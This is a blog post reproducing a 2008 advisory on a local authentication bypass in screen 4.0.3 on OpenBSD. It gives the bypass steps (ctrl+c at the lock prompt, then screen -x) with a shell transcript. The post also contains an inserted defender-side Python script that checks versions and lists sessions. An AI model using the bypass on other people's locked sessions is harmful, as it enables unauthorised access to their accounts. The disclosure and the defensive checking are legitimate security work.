Wednesday, July 30, 2008

screen 4.0.3 Local Authentication Bypass Vulnerability (OpenBSD)

###################################
#screen 4.0.3 Local Authentication Bypass Vulnerability (OpenBSD)
###################################

_ _ _____ _ ___ _____ _ _
/ / / / ____/ / / _/_ __/ / / /
/ /_/ / __/ / / / / / / / /_/ /
/ __ / /___/ /____/ / / / / __ /
/_/ /_/_____/_____/___/ /_/ /_/ /_/
Helith - 0815
--------------------------------------------------------------------------------

Author: Rembrandt
Date : Known since somewhere in &cant_remember (some years, really..)
Affected Software: screen <= 4.0.3
Affected OS : OpenBSD (any up to current (which will become oBSD 4.4))
Type: Local
Type: Authentication Bypass

Greets go to: Helith and all affiliated/loyal people


I did not find an Advisory related to this so I decided to write a leet one.

screen is vulnerable to an authentication bypass which allows local attackers
to gain system access in case screen was locked with a password.

It has been tested on OpenBSD + screen 4.0.3 on x86/amd64.
But due to the nature of the behavior of screen and OpenBSD it should be
architecture/version independent for now.


How to check this?

Lock screen using ctrl+x
Choose a Password
Confirm the Password

Screen asks for a Password to unlock the screen.
Just press ctrl+c and, if you like, screen -x to reattach the screen session.

Example:

$ testscreen
/bin/ksh: testscreen: not found
$
Key:
Again:
Screen used by rembrandt .
Password:
$ screen -x
There are several suitable screens on:
29602.ttyC0.raven (Attached)
25144.ttyC1.raven (Detached)
Type "screen [-d] -r [pid.]tty.host" to resume one of them.
$ screen -x 25144
$ testscreen
/bin/ksh: testscreen: not found
$

Because of the nature of a locked screen you won't be able to lock your shell.
screen will never ask you for a password.

Of course this also works if you get access to a SSH session which has a locked
screen running. So in case you have locked your screen session which contains
an open SSH session to a host where you also have a locked screen session,
you might have no password protection at all in case all systems are OpenBSD.
That is just another example. Important for you should be the combination of
screen and OpenBSD.
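As an added defender-side check (not part of the original advisory, and not code from the screen project), the script below parses the two outputs an administrator would collect on a host: the version banner from `screen -v` and the session listing shown in the example above. It flags installs at or below the affected version 4.0.3 and lists every session reachable by the same uid through `screen -x`, so a locked session can be found and accounted for. The sample outputs are constructed to mirror the lines on this page; the "4.00.03" spelling of the version banner and the exact `screen -v` wording are assumptions about screen's output format.

```python
import re
import subprocess
from typing import List, NamedTuple, Optional, Tuple

# Constructed sample of `screen -v` output (assumption: screen 4.0.3 prints "4.00.03").
SAMPLE_SCREEN_V = "Screen version 4.00.03 (FAU) 23-Oct-06"

# Constructed sample session listing, modelled on the `screen -x` output in the advisory.
SAMPLE_SCREEN_LS = (
    "There are several suitable screens on:\n"
    "\t29602.ttyC0.raven\t(Attached)\n"
    "\t25144.ttyC1.raven\t(Detached)\n"
    'Type "screen [-d] -r [pid.]tty.host" to resume one of them.\n'
)

# Last affected version named by the advisory; the affected OS is OpenBSD.
LAST_AFFECTED_VERSION = (4, 0, 3)
AFFECTED_OS = "OpenBSD"

_VERSION_RE = re.compile(r"Screen version (\d+)\.(\d+)\.(\d+)")
# One session line: "<pid>.<tty>.<host>" followed by a parenthesised state.
_SESSION_RE = re.compile(r"^\s*(\d+)\.(\S+)\s+\((\w+)", re.MULTILINE)


class Session(NamedTuple):
    pid: int
    name: str    # "ttyC0.raven" part of the socket name
    state: str   # "Attached", "Detached", "Multi", ...


def parse_version(screen_v_output: str) -> Optional[Tuple[int, int, int]]:
    """Turn 'Screen version 4.00.03 (FAU) ...' into (4, 0, 3); None if unrecognised."""
    m = _VERSION_RE.search(screen_v_output)
    if not m:
        return None
    return (int(m.group(1)), int(m.group(2)), int(m.group(3)))


def is_affected_version(version: Tuple[int, int, int]) -> bool:
    """True when the installed screen is at or below the advisory's affected version."""
    return version <= LAST_AFFECTED_VERSION


def parse_sessions(screen_ls_output: str) -> List[Session]:
    """Extract every session line from `screen -ls` / `screen -x` style output."""
    return [
        Session(int(pid), name, state)
        for pid, name, state in _SESSION_RE.findall(screen_ls_output)
    ]


def assess(screen_v_output: str, screen_ls_output: str, sysname: str) -> dict:
    """Summarise exposure: version in range, OS in scope, and sessions the same uid can reattach."""
    version = parse_version(screen_v_output)
    sessions = parse_sessions(screen_ls_output)
    return {
        "version": version,
        "version_affected": version is not None and is_affected_version(version),
        "os_in_scope": sysname == AFFECTED_OS,
        # Every listed session, attached or not, is reachable with `screen -x` by this uid.
        "reattachable_sessions": [f"{s.pid}.{s.name} ({s.state})" for s in sessions],
    }


def _run(argv: List[str]) -> str:
    """Collect live output; `screen -ls` exits non-zero when sessions exist, so ignore the status."""
    proc = subprocess.run(argv, capture_output=True, text=True)
    return proc.stdout + proc.stderr


if __name__ == "__main__":
    try:
        import os
        result = assess(_run(["screen", "-v"]), _run(["screen", "-ls"]), os.uname().sysname)
    except FileNotFoundError:
        # screen not installed here: fall back to the constructed samples so the check still demonstrates.
        result = assess(SAMPLE_SCREEN_V, SAMPLE_SCREEN_LS, "OpenBSD")
    for key, value in result.items():
        print(f"{key}: {value}")
```

Run it on the host you are reviewing; if `version_affected` and `os_in_scope` are both true, treat the built-in screen lock as no protection and rely on locking the terminal or tty session itself, and use the session list to see which locked sessions another process under the same uid could reattach.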

Do not claim it does not work because you just tested this against the latest
Linux/Solaris/Whatever.

It is known to work and I mentioned the OS.
Still it is known that it worked against some scary Linux distributions
which are not really common.

All security websites which report this as a fake may consider updating their
reports instead of simply claiming wrong things.

Have fun!
